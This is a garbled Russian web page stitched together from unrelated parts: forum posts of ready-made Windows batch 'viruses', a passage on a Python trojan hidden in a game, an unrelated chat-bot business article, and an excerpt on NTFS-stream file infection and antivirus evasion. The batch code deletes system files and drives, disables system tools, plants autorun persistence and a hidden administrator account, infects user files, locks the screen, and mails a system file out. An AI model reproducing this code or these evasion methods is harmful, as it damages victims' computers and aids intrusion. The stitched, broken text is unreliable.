Как создать бота вирус

Обновлено: 28.03.2024

В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный Блокнот Windows. Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

time 0:00 >nul – Поставить время на 00:00

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши

del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК

shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

net share "ResName"="C:" >nul – Расшарить диск C:

label C:Диск >nul – Переименовать диск С:

del "%0" >nul – Самоликвидация вируса

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

Здесь готовые Bat-вирусы. Просто ставляем код в bat файл и все.

Убирает рабочий стол

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

@echo off
shutdown -s -t 1 -c "lol" >nul

@echo off
shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul

@echo off
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет звуки Windows

@echo off
del "%SystemRoot%Media" /q >nul

Запрещает заходить в панель управления

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины

reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

X-Shar

Открываем блокнот, пишем:
md 1
md 2
md 3
md 4
Команда md создает папку, в данном случае у нас создастся четыре папки с названиями 1,2,3 и 4. На первый взгляд весьма бесполезная команда, но с её помощью можно создать жесткие тормоза на компе.
Открываем Microsoft Office Excel, двойной клик по верхней левой ячейке, вписываем в эту ячейку md 1
Кликаем по правому нижнему краю ЯЧЕЙКИ и тянем вниз. Если все сделано правильно, ячейки начнут размножаться, увеличивая цифру +1. Держим столько, сколько хотим чтобы у нас появилось папок (чем больше, тем сильнее будут тормоза)
Скопируйте все это и вставьте в наш блокнот. Сохраните и переименуйте из .txt в .bat
При открытии начнут создаваться папки, это будет долгий процесс и комп будет страшно пыхтеть. Удалить все эти папки будет еще сложнее
Не рекомендую тестировать на своём компьютере

X-Shar

rd [Буква_Диск]: /s /q

Удаляет все файлы в program files :
del c:/rogram Files/q

Убивает процесс explorer.exe:
taskkill /f /im explorer.exe >nul

Создает миллион папок:
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере:
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL:
del %0

Будет открывать бесконечно Пэинт:
😡
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt:
assoc .lnk=.txt

Заражает Autoexec:
copy ""%0"" "%SystemRoot%system32atinit.bat" >nul
reg add "HKCUSOFTWAREMicrosoftCommand Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%syste m32atinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить):
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

Cбой системы (!) – выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать:
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна):
rundll32 user,SwapMouseButton

Sascha

Заместитель Администратора


Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c "lol" >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul

Удаление дров
@echo off
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет звуки Windows
@echo off
del "%SystemRoot%Media" /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
😡
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy ""%0"" "%SystemRoot%system32atinit.bat" >nul
reg add "HKCUSOFTWAREMicrosoftCommand Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%syste m32atinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

сбой системы (!) – выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Удаляет ядро системы
del %systemroot%system32HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%windowssystem32
undll32.vbs
echo do >> %systemdrive%windowssystem32
undll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%windowssystem32
undll32.dat", True) >> %systemdrive%windowssystem32
undll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32
undll32.vbs
echo tx.close >> %systemdrive%windowssystem32
undll32.vbs
echo FSO.DeleteFile "%systemdrive%windowssystem32
undll32.dat" >> %systemdrive%windowssystem32
undll32.vbs
echo loop >> %systemdrive%windowssystem32
undll32.vbs
start %systemdrive%windowssystem32
undll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32
undll32.vbs /f

") = 25 >> %temp% emp.vbs
echo Flds.Update >> %temp% emp.vbs
echo iMsg.Configuration = iConf >> %temp% emp.vbs
echo iMsg.To = strTo >> %temp% emp.vbs
echo iMsg.From = strFrom >> %temp% emp.vbs
echo iMsg.Subject = strSubject >> %temp% emp.vbs
echo iMsg.TextBody = strBody >> %temp% emp.vbs
echo iMsg.AddAttachment "c:oot.ini" >> %temp% emp.vbs
echo iMsg.Send >> %temp% emp.vbs
echo End Function >> %temp% emp.vbs
echo Set iMsg = Nothing >> %temp% emp.vbs
echo Set iConf = Nothing >> %temp% emp.vbs
echo Set Flds = Nothing >> %temp% emp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp% emp.vbs
start %temp% emp.vbs
start %temp% emp1.vbs
start %temp% emp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус.
title Внимание.
CHCP 866
IF EXIST C:windowsoot.bat (
goto ok )
cls
IF NOT EXIST C:windowsoot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:.reg
ECHO. >> C:.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >> C:.reg
ECHO. >> C:.reg
ECHO "Shell"="Explorer.exe, C:\windows\boot.bat " >> C:.reg
start/wait regedit -s C:.reg
del C:.reg
ECHO @echo off >>C:windowsoot.bat
ECHO C:WINDOWSsystem32 askkill.exe /f /im Explorer.exe >>C:windowsoot.bat
ECHO reg add "HKCUsoftwareMicrosoftWindowsCurrentVersionPoliciessystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:windowsoot.bat
ECHO start sys.bat >>C:windowsoot.bat
attrib +r +a +s +h C:windowsoot.bat
copy virus.bat c:windowssys.bat
attrib +r +a +s +h C:windowssys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:windowsoot.bat
del C:windowsoot.bat
attrib -r -a -s -h C:windowssys.bat
del C:windowssys.bat
cls
:gold
start C:
:end

Добавляет программу в автозагрузку ОС
copy ""%0"" "%SystemRoot%system32File.bat"
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "Filel" /t REG_SZ /d "%SystemRoot%system32File.bat" /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

@echo off
chcp 1251
echo щаска.
color 4
@echo Вас собирается


В этой статье я рас­ска­жу, как написать на Python прос­тей­ший тро­ян с уда­лен­ным дос­тупом, а для боль­шей скрыт­ности мы встро­им его в игру. Даже если ты не зна­ешь Python, ты смо­жешь луч­ше понять, как устро­ены такие вре­доно­сы, и поуп­ражнять­ся в прог­рамми­рова­нии.

Ко­неч­но, при­веден­ные в статье скрип­ты никак не годят­ся для исполь­зования в боевых усло­виях: обфуска­ции в них нет, прин­ципы работы прос­ты как пал­ка, а вре­донос­ные фун­кции отсутс­тву­ют нап­рочь. Тем не менее при некото­рой сме­кал­ке их воз­можно исполь­зовать для нес­ложных пакос­тей — нап­ример, вырубить чей‑нибудь компь­ютер в клас­се (или в офи­се, если в клас­се ты не наиг­рался).

Теория

Ло­гика подоб­ного зараже­ния в том, что поль­зователь сам ска­чает себе вре­донос на компь­ютер (нап­ример, под видом кряк­нутой прог­раммы), сам отклю­чит защит­ные механиз­мы (ведь прог­рамма выг­лядит хорошей) и захочет оста­вить надол­го. Хакеры и тут не дрем­лют, так что в новос­тях то и дело мель­кают сооб­щения о новых жер­твах пират­ско­го ПО и о шиф­роваль­щиках, поража­ющих любите­лей халявы. Но мы‑то зна­ем, что бес­плат­ный сыр быва­ет толь­ко в мусор­ке, и сегод­ня научим­ся очень прос­то начинять тот самый сыр чем‑то не впол­не ожи­даемым.

warning

Вся информа­ция пре­дос­тавле­на исклю­читель­но в озна­коми­тель­ных целях. Ни автор, ни редак­ция не несут ответс­твен­ности за любой воз­можный вред, при­чинен­ный матери­ала­ми дан­ной статьи. Несан­кци­они­рован­ный дос­туп к информа­ции и наруше­ние работы сис­тем могут прес­ледовать­ся по закону. Пом­ни об этом.

Определяем IP

Сна­чала нам (то есть нашему тро­яну) нуж­но опре­делить­ся, где он ока­зал­ся. Важ­ная часть тво­ей информа­ции — IP-адрес, по которо­му с заражен­ной машиной мож­но будет соеди­нить­ся в даль­нейшем.

Нач­нем писать код. Сра­зу импорти­руем биб­лиоте­ки:

Обе биб­лиоте­ки не пос­тавля­ются с Python, поэто­му, если они у тебя отсутс­тву­ют, их нуж­но уста­новить коман­дой pip .

Код получе­ния внеш­него и внут­ренне­го адре­сов будет таким. Обра­ти вни­мание, что, если у жер­твы нес­коль­ко сетевых интерфей­сов (нап­ример, Wi-Fi и Ethernet одновре­мен­но), этот код может вес­ти себя неп­равиль­но.

Ес­ли с локаль­ным адре­сом все более‑менее прос­то — находим имя устрой­ства в сети и смот­рим IP по име­ни устрой­ства, — то вот с пуб­личным IP все нем­ного слож­нее.

Я выб­рал сайт api. ipify. org , так как на выходе нам выда­ется толь­ко одна стро­ка — наш внеш­ний IP. Из связ­ки пуб­личный + локаль­ный IP мы получим поч­ти точ­ный адрес устрой­ства.

Вы­вес­ти информа­цию еще про­ще:

Ни­ког­да не встре­чал конс­трук­ции типа print( f'<> ') ? Бук­ва f озна­чает фор­матиро­ван­ные стро­ковые литера­лы. Прос­тыми сло­вами — прог­рам­мные встав­ки пря­мо в стро­ку.

Стро­ковые литера­лы не толь­ко хорошо смот­рятся в коде, но и помога­ют избе­гать оши­бок типа сло­жения строк и чисел (Python — это тебе на JavaScript!).

Компания Just Apple производит и продает оборудование для сладкого фастфуда. Клиенты компании часто задают однотипные вопросы, и сотрудники тратят много времени на ответы. Чтобы сократить временные издержки, компания запустила чат-бота. Теперь основную информацию о работе компании и характеристиках оборудования клиенты получают от робота. На примере компании Just Apple расскажу, как использовать бота в бизнесе, и как я без опыта в программировании за два часа запустила бота в Telegram.

Что такое чат-бот

Чат-боты — это виртуальные программы-помощники, которые берут на себя рутинные операции в бизнесе: отвечают на вопросы, формируют заказы, рассылают уведомления. Иногда пользователь не сразу понимает, кто отвечает на вопросы: реальный человек или бот — настолько детально продумано его поведение.

По данным исследования агентства Accenture, 60% респондентов уже используют чат-боты в своей работе, 7% — планируют внедрить их. Оставшиеся 33% — не знают о возможностях этой технологии или не применяют ее.

Чат-бота для бизнеса можно внедрить на разных площадках:

  • в социальных сетях ВКонтакте, Одноклассники, Facebook, Twitter, Instagram;
  • в мессенджерах Telegram, WhatsApp, Skype, Viber;
  • на сайте компании.

Если робот не может ответить на вопрос клиента, он предлагает оставить номер телефона и отправляет уведомление сотруднику компании. При первой возможности сотрудник связывается с клиентом и отвечает на его вопросы.

Для чего нужны чат-боты

Автоматизация общения с клиентами. Робот работает в режиме нон-стоп и круглые сутки может отвечать на вопросы клиентов. Если у бота нет ответа на вопрос, а оператор не на связи — робот собирает контакты потенциальных покупателей через форму обратной связи.

Можно настроить другие опции, например, во ВКонтакте через чат-бота можно принимать платежи. Если банковская карта пользователя привязана к платежной системе VK Pay, пользователь оплачивает заказ прямо во ВКонтакте без перехода на сторонние ресурсы. Это повышает безопасность платежа, а, значит, и лояльность клиентов.

Сколько стоит создание чат-бота

Услуги разработчика. Созданием и запуском чат-ботов занимаются разработчики. Они разрабатывают логику бота с учетом поставленных задач и создают виртуального помощника. Стоимость их услуг зависит от сложности поставленных задач. Например, создание сложной многоуровневой программы, ее интеграция с платежной системой и CRM стоит от 100 000 ₽.

Но если нужен простой бот для бизнес-сообщества — цена разработчика будет в несколько раз дешевле.

Стоимость услуг фрилансера на разработку и создание простых чат-ботов. В стоимость разработки входит визуальное проектирование бота, в создание — его настройка и запуск

Стоимость услуг фрилансера на разработку и создание простых чат-ботов. В стоимость разработки входит визуальное проектирование бота, в создание — его настройка и запуск

Тарифы онлайн-конструктора. Существует множество конструкторов чат-ботов для бизнеса, например, Robochat , BotHelp , Botmother , SendPulse . С помощью конструктора можно самостоятельно запустить робота. Большинство сервисов платные, но у каждого конструктора есть бесплатная демоверсия с ограниченным набором функций. Например, можно бесплатно создать до трех чат-ботов на 1000 подписчиков, используя самые простые шаблоны.

Как я бесплатно создала чат-бота в Telegram

«Бота ВКонтакте я сделал самостоятельно: прошел бесплатное обучение, посмотрел информацию в интернете и обучающие видео. Одновременно работал над ботом. В общей сложности на создание потратил около недели.

Я решила убедиться, что бота для бизнеса можно запустить без навыков программирования, эксперимент проводила в Telegram.

Составила перечень типовых вопросов. Представила, что у меня маркетинговое агентство. Так как фирма гипотетическая, самым сложным оказалось продумать путь клиента: какие вопросы он может задавать, как перемещается от заинтересованности к заказу.

Чтобы составить список вопросов, поставила себя на место клиента. Подумала, о чем бы я спросила менеджера перед заказом, и накидала 10 вопросов. В реальности вопросов, конечно, больше, но для эксперимента — достаточно.

Однако задача бота не просто отвечать на вопросы клиента, а вести его по воронке продаж. Без реального бизнеса невозможно правильно построить путь клиента — необходимо знать, как именно он принимает решение о покупке, кто может оказывать на него влияние, какое количество касаний необходимо, какие рекламные каналы задействованы. Предпринимателю это важно, но для эксперимента я решила этим пренебречь и создать робота с минимальным набором функций. Считаю, если разобраться с основными принципами создания бота, то позже можно добавить функции и усложнить меню.


Пара вступительных слов

Итак, давай погрузимся в мрачный лабиринт кибернетического мира, ряды обитателей которого скоро пополнятся еще одним зловредным созданием. Внедрение вируса в исполняемый файл в общем случае достаточно сложный и мучительный процесс. Как минимум для этого требуется изучить формат PE-файла и освоить десятки API-функций. Но ведь такими темпами мы не напишем вирус и за сезон, а хочется прямо здесь и сейчас. Но хакеры мы или нет? Файловая система NTFS (основная файловая система Windows) содержит потоки данных (streams), называемые также атрибутами. Внутри одного файла может существовать несколько независимых потоков данных.

WARNING

Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи. Помни, что неправомерный доступ к компьютерной информации и распространение вредоносного ПО влекут ответственность согласно статьям 272 и 273 УК РФ.

Файловая система NTFS поддерживает несколько потоков в рамках одного файла

Файловая система NTFS поддерживает несколько потоков в рамках одного файла

Имя потока отделяется от имени файла знаком двоеточия (:), например my_file:stream . Основное тело файла хранится в безымянном потоке, но мы также можем создавать и свои потоки. Заходим в FAR Manager, нажимаем клавиатурную комбинацию Shift + F4 , вводим с клавиатуры имя файла и потока данных, например xxx:yyy , и затем вводим какой-нибудь текст. Выходим из редактора и видим файл нулевой длины с именем xxx .

Почему же файл имеет нулевую длину? А где же только что введенный нами текст? Нажмем клавишу и… действительно не увидим никакого текста. Однако ничего удивительного в этом нет. Если не указать имя потока, то файловая система отобразит основной поток, а он в данном случае пуст. Размер остальных потоков не отображается, и дотянуться до их содержимого можно, только указав имя потока явно. Таким образом, чтобы увидеть текст, необходимо ввести следующую команду: more < xxx:yyy .

Будем мыслить так: раз создание дополнительных потоков не изменяет видимых размеров файла, то пребывание в нем постороннего кода, скорее всего, останется незамеченным. Тем не менее, чтобы передать управление на свой поток, необходимо модифицировать основной поток. Контрольная сумма при этом неизбежно изменится, что наверняка не понравится антивирусным программам. Методы обмана антивирусных программ мы рассмотрим в дальнейшем, а пока определимся со стратегией внедрения.

Алгоритм работы вируса

Закрой руководство по формату исполняемых файлов (Portable Executable, PE). Для решения поставленной задачи оно нам не понадобится. Действовать будем так: создаем внутри инфицируемого файла дополнительный поток, копируем туда основное тело файла, а на освободившееся место записываем наш код, который делает свое черное дело и передает управление основному телу вируса.

Работать такой вирус будет только на Windows и только под NTFS. На работу с другими файловыми системами он изначально не рассчитан. Например, на разделах FAT оригинальное содержимое заражаемого файла будет попросту утеряно. То же самое произойдет, если упаковать файл с помощью ZIP или любого другого архиватора, не поддерживающего файловых потоков.

Архиватор RAR способен сохранять файловые потоки в процессе архивации

Архиватор RAR способен сохранять файловые потоки в процессе архивации

Теперь настал момент поговорить об антивирусных программах. Внедрить вирусное тело в файл — это всего лишь половина задачи, и притом самая простая. Теперь создатель вируса должен продумать, как защитить свое творение от всевозможных антивирусов. Эта задача не так сложна, как кажется на первый взгляд. Достаточно заблокировать файл сразу же после запуска и удерживать его в этом состоянии в течение всего сеанса работы с Windows вплоть до перезагрузки. Антивирусы просто не смогут открыть файл, а значит, не смогут обнаружить и факт его изменения. Существует множество путей блокировки — от CreateFile со сброшенным флагом dwSharedMode до LockFile/LockFileEx .

Основная ошибка большинства вирусов состоит в том, что, однажды внедрившись в файл, они сидят и покорно ждут, пока антивирус не обнаружит их и не удалит. А ведь сканирование современных винчестеров занимает значительное время, зачастую оно растягивается на многие часы. В каждый момент времени антивирус проверяет всего один файл, поэтому, если вирус ведет кочевую жизнь, мигрируя от одного файла к другому, вероятность, что его обнаружат, стремительно уменьшается.

Мы будем действовать так: внедряемся в файл, ждем 30 секунд, удаляем свое тело из файла, тут же внедряясь в другой. Чем короче период ожидания, тем выше шансы вируса остаться незамеченным, но и тем выше дисковая активность. А регулярные мигания красной лампочки без видимых причин сразу же насторожат опытных пользователей, поэтому приходится хитрить.

Например, можно вести мониторинг дисковой активности и заражать только тогда, когда происходит обращение к какому-нибудь файлу. В решении этой задачи нам поможет специализированное ПО, например монитор процессов Procmon.

Продолжение доступно только участникам

Вариант 2. Открой один материал

Крис Касперски

Известный российский хакер. Легенда ][, ex-редактор ВЗЛОМа. Также известен под псевдонимами мыщъх, nezumi (яп. 鼠, мышь), n2k, elraton, souriz, tikus, muss, farah, jardon, KPNC.

Читайте также: